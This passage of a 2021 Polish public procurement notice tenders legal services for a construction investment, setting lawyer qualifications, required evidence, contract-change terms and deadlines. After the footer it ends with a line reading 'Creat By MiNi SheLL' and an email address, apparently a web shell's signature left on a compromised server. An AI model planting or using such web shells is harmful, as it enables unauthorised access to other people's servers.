inwestorskiego lub usług projektowych nie mniejszej niż 2.000.000 zł brutto; obsługa prawna powinna obejmować w szczególności przygotowanie dokumentacji formalnoprawnej niezbędnej do przeprowadzenia postępowania o udzielenia zamówienia publicznego (w tym projektu ogłoszenia o zamówieniu publicznym, postanowień specyfikacji istotnych warunków zamówienia lub specyfikacji warunków zamówienia, projektu umowy w sprawie zamówienia publicznego) oraz doradztwo prawne w tym zakresie,<br/>- przy czym, w przypadku usług nadal wykonywanych, faktycznie wykonany zakres usług powinien spełniać powyższe wymogi na dzień składania ofert;<br/>b)dysponuje lub będzie dysponował następującymi osobami, które skieruje do realizacji zamówienia:<br/>i.prawnik-koordynator, który spełnia następujące wymagania:<br/>(i)wykonuje - od co najmniej 8 lat, licząc od dnia uzyskania wpisu na listę radców prawnych lub adwokatów lub prawników zagranicznych - zawód radcy prawnego lub adwokata lub prawnika zagranicznego wpisanego na listę prawników zagranicznych prowadzoną odpowiednio przez okręgowe rady adwokackie lub rady okręgowych izb radców prawnych,<br/>(ii)posiada doświadczenie polegające na kompleksowej obsłudze prawnej co najmniej jednego postępowania o udzielenie zamówienia publicznego na roboty budowlane dotyczące budowy lub przebudowy budynku lub budynków zaliczanych do co najmniej jednej z następujących kategorii oznaczonych symbolem PKOB: 1211, 1212, 1220, 1230, 1241, 1261, 1262, 1263, 1264, 1265 lub 1273 - o wartości robót budowlanych nie mniejszej niż 60.000.000 zł brutto, na potrzeby którego świadczył kompleksową obsługę prawną, która obejmowała w szczególności przygotowanie dokumentacji formalnoprawnej niezbędnej do przeprowadzenia postępowania o udzielenie zamówienia publicznego (w tym projektu ogłoszenia o zamówieniu publicznym, postanowień specyfikacji istotnych warunków zamówienia lub specyfikacji warunków zamówienia, projektu umowy w sprawie zamówienia publicznego) oraz doradztwo prawne w tym zakresie; postępowanie o udzielenie zamówienia publicznego, którego dotyczy doświadczenie prawnika, powinno zostać zakończone zawarciem umowy o udzielenie zamówienia publicznego lub unieważnieniem postępowania o udzielenie zamówienia publicznego z przyczyn innych niż obarczenie postępowania niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego,<br/>(iii)posiada wiedzę i doświadczenie w zakresie prawa zamówień publicznych, prawa cywilnego, prawa administracyjnego, prawa budowlanego, przepisów o ochronie zabytków i opiece nad zabytkami, postępowania cywilnego i postępowania administracyjnego,<br/>ii.prawnik-zastępca koordynatora, który spełnia następujące wymagania:<br/>(i)wykonuje - od co najmniej 8 lat, licząc od dnia uzyskania wpisu na właściwą listę radców prawnych lub adwokatów lub prawników zagranicznych - zawód radcy prawnego lub adwokata lub prawnika zagranicznego wpisanego na listę prawników zagranicznych prowadzoną odpowiednio przez okręgowe rady adwokackie lub rady okręgowych izb radców prawnych,<br/>(ii)	posiada doświadczenie polegające na kompleksowej obsłudze prawnej co najmniej jednego postępowania o udzielenie zamówienia publicznego na roboty budowlane dotyczące budowy lub przebudowy budynku lub budynków zaliczanych do co najmniej jednej z następujących kategorii oznaczonych symbolem PKO: 1211, 1212, 1220, 1230, 1241, 1261, 1262, 1263, 1264, 1265 lub 1273 - o wartości robót budowlanych nie mniejszej niż 60.000.000 zł brutto, na potrzeby którego świadczył kompleksową obsługę prawną, która obejmowała w szczególności przygotowanie dokumentacji formalnoprawnej niezbędnej do przeprowadzenia postępowania o udzielenie zamówienia publicznego (w tym projektu ogłoszenia o zamówieniu publicznym, postanowień specyfikacji istotnych warunków zamówienia lub specyfikacji warunków zamówienia, projektu umowy w sprawie zamówienia publicznego) oraz doradztwo prawne w tym zakresie; postępowanie o udzielenie zamówienia publicznego, którego dotyczy doświadczenie prawnika, powinno zostać zakończone zawarciem umowy o udzielenie zamówienia publicznego lub unieważnieniem postępowania o udzielenie zamówienia publicznego z przyczyn innych niż obarczenie postępowania niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego,<br/>(iii)	posiada wiedzę i doświadczenie w zakresie prawa zamówień publicznych, prawa cywilnego, prawa administracyjnego, prawa budowlanego, przepisów o ochronie zabytków i opiece nad zabytkami, postępowania cywilnego i postępowania administracyjnego,<br/>iii.prawnik-specjalista w zakresie prawa zamówień publicznych, który spełnia następujące wymagania:<br/>(i)posiada doświadczenie zawodowe w zakresie prawa zamówień publicznych od co najmniej 5 lat,<br/>(ii)posiada doświadczenie polegające na obsłudze postępowań o udzielenie zamówienia publicznego, w ramach których przygotowywał dokumentację formalnoprawną niezbędną do przeprowadzenia postępowania o udzielenia zamówienia publicznego (w tym projekt ogłoszenia o zamówieniu publicznym, postanowienia specyfikacji istotnych warunków zamówienia lub specyfikacji warunków zamówienia, projekt umowy w sprawie zamówienia publicznego), na potrzeby:<br/>- co najmniej 2 postępowań o udzielenie zamówienia publicznego na roboty budowlane o wartości co najmniej jednego z nich nie mniejszej niż progi unijne w rozumieniu ustawy z dnia 11-09-2019 r. - Prawo zamówień publicznych (a w przypadku zamówień udzielanych na podstawie ustawy z dnia 29-01-2004 r. - Prawo zamówień publicznych - o wartości wymagającej przekazywania ogłoszeń Urzędowi Publikacji Unii Europejskiej), postępowanie o udzielenie zamówienia publicznego powinno zostać zakończone zawarciem umowy o udzielenie zamówienia publicznego lub unieważnieniem postępowania o udzielenie zamówienia publicznego z przyczyn innych niż obarczenie postępowania niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego,<br/>- co najmniej 1 postępowania o udzielenie zamówienia publicznego na dostawy o wartości nie mniejszej niż progi unijne w rozumieniu ustawy z dnia 11-09-2019 r. - Prawo zamówień publicznych (a w przypadku zamówień udzielanych na podstawie ustawy z dnia 29-01-2004 r. - Prawo zamówień publicznych - o wartości wymagającej przekazywania ogłoszeń Urzędowi Publikacji Unii Europejskiej); postępowanie o udzielenie zamówienia publicznego powinno zostać zakończone zawarciem umowy o udzielenie zamówienia publicznego lub unieważnieniem postępowania o udzielenie zamówienia publicznego z przyczyn innych niż obarczenie postępowania niemożliwą do usunięcia wadą uniemożliwiającą zawarcie niepodlegającej unieważnieniu umowy w sprawie zamówienia publicznego,<br/>iv.prawnik-specjalista w zakresie prawa budowlanego, który spełnia następujące wymagania:<br/>(i)	wykonuje - od co najmniej 5 lat, licząc od dnia uzyskania wpisu na listę radców prawnych lub adwokatów lub prawników zagranicznych - zawód radcy prawnego lub adwokata lub prawnika zagranicznego wpisanego na listę prawników zagranicznych prowadzoną odpowiednio przez okręgowe rady adwokackie lub rady okręgowych izb radców prawnych,<br/>(ii)posiada doświadczenie polegające na obsłudze prawnej co najmniej trzech inwestycji budowlanych o wartości każdej z nich nie mniejszej niż 20.000.000 zł brutto; obsługa prawna może polegać na przygotowaniu dokumentacji formalnoprawnej niezbędnej do realizacji inwestycji (w tym projektu umowy o roboty budowlane) lub na obsłudze prawnej realizacji inwestycji,<br/>(iii)posiada wiedzę i doświadczenie w zakresie prawa budowlanego, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; wzór oświadczenia stanowi załącznik nr 9 do SWZ;<br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej nie mniejszej niż 600.000 zł (jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć tych dokumentów, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie tego warunku udziału w postępowaniu);<br/>2)	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (licząc wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (licząc wstecz od dnia, w którym upływa termin składania ofert); wykaz ten wraz z dowodami określającymi, czy te usługi zostały wykonane lub są wykonywane należycie, powinien potwierdzać, iż wykonawca spełnia warunki udziału w postępowaniu określone w rozdziale VIII ust. 2 pkt 4 lit. a SWZ; wzór wykazu wykonanych usług stanowi załącznik nr 10 do SWZ;<br/>3)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nie funkcji oraz informacją o podstawie do dysponowania tymi osobami; wykaz ten powinien potwierdzać, iż wykonawca spełnia warunki udziału w postępowaniu określone w rozdziale VIII ust. 2 pkt 4 lit. b SWZ, a w szczególności wskazywać - odpowiednio dla poszczególnych osób - kwalifikacje zawodowe, okres wykonywania zawodu oraz wykaz doświadczenia poszczególnych osób; wykaz powinien być sporządzony w sposób pozwalający zamawiającemu ocenić doświadczenie poszczególnych osób zgodnie z wymaganiami określonymi w rozdziale VIII ust. 2 pkt 4 lit. b SWZ; wzór wykazu osób skierowanych do realizacji zamówienia stanowi załącznik nr 4 do SWZ (część I);</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 PZP (w rozdziale X ust. 1 SWZ), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W przypadku, o którym mowa powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, którego wzór stanowi załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmiany Umowy w przypadkach określonych w przepisach prawa oraz w razie:<br/>1)	konieczności wprowadzenia zmian będących następstwem zmian powszechnie obowiązujących przepisów prawa – w zakresie wynikającym ze zmienionych przepisów prawa;<br/>2)	zaistniałych rozbieżności lub niejasności w treści Umowy, których nie można usunąć w inny sposób – poprzez wprowadzenie zmian doprecyzowujących treść Umowy i zapewniających jej jednoznaczną interpretację; <br/>3)	odpowiedniego wydłużenia terminów ramowego harmonogramu inwestycji określonego w OPZ z przyczyn niezależnych od Stron lub z przyczyn leżących po stronie Zamawiającego - odpowiednio o czas trwania przyczyny powodującej konieczność wydłużenia terminów ramowego harmonogramu inwestycji;<br/>4)	gdy zmiany te są korzystne dla Zamawiającego, o ile zmiany te nie naruszają postanowień art. 454 ust. 2 PZP;<br/>5)	wystąpienia opóźnienia w dokonaniu określonych czynności ze strony właściwych organów, które nie są następstwem okoliczności, za które odpowiedzialność ponosi Wykonawca - odpowiednio o czas trwania opóźnienia w dokonaniu określonych czynności ze strony właściwych organów;<br/>6)	wystąpienia siły wyższej w rozumieniu § 20 powodującej konieczność wstrzymania lub zawieszenia wykonywania Umowy poprzez zmianę terminów lub sposobu realizacji Umowy - odpowiednio o czas trwania siły wyższej lub w sposób zapobiegający skutkom wystąpienia siły wyższej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-15 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-13</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com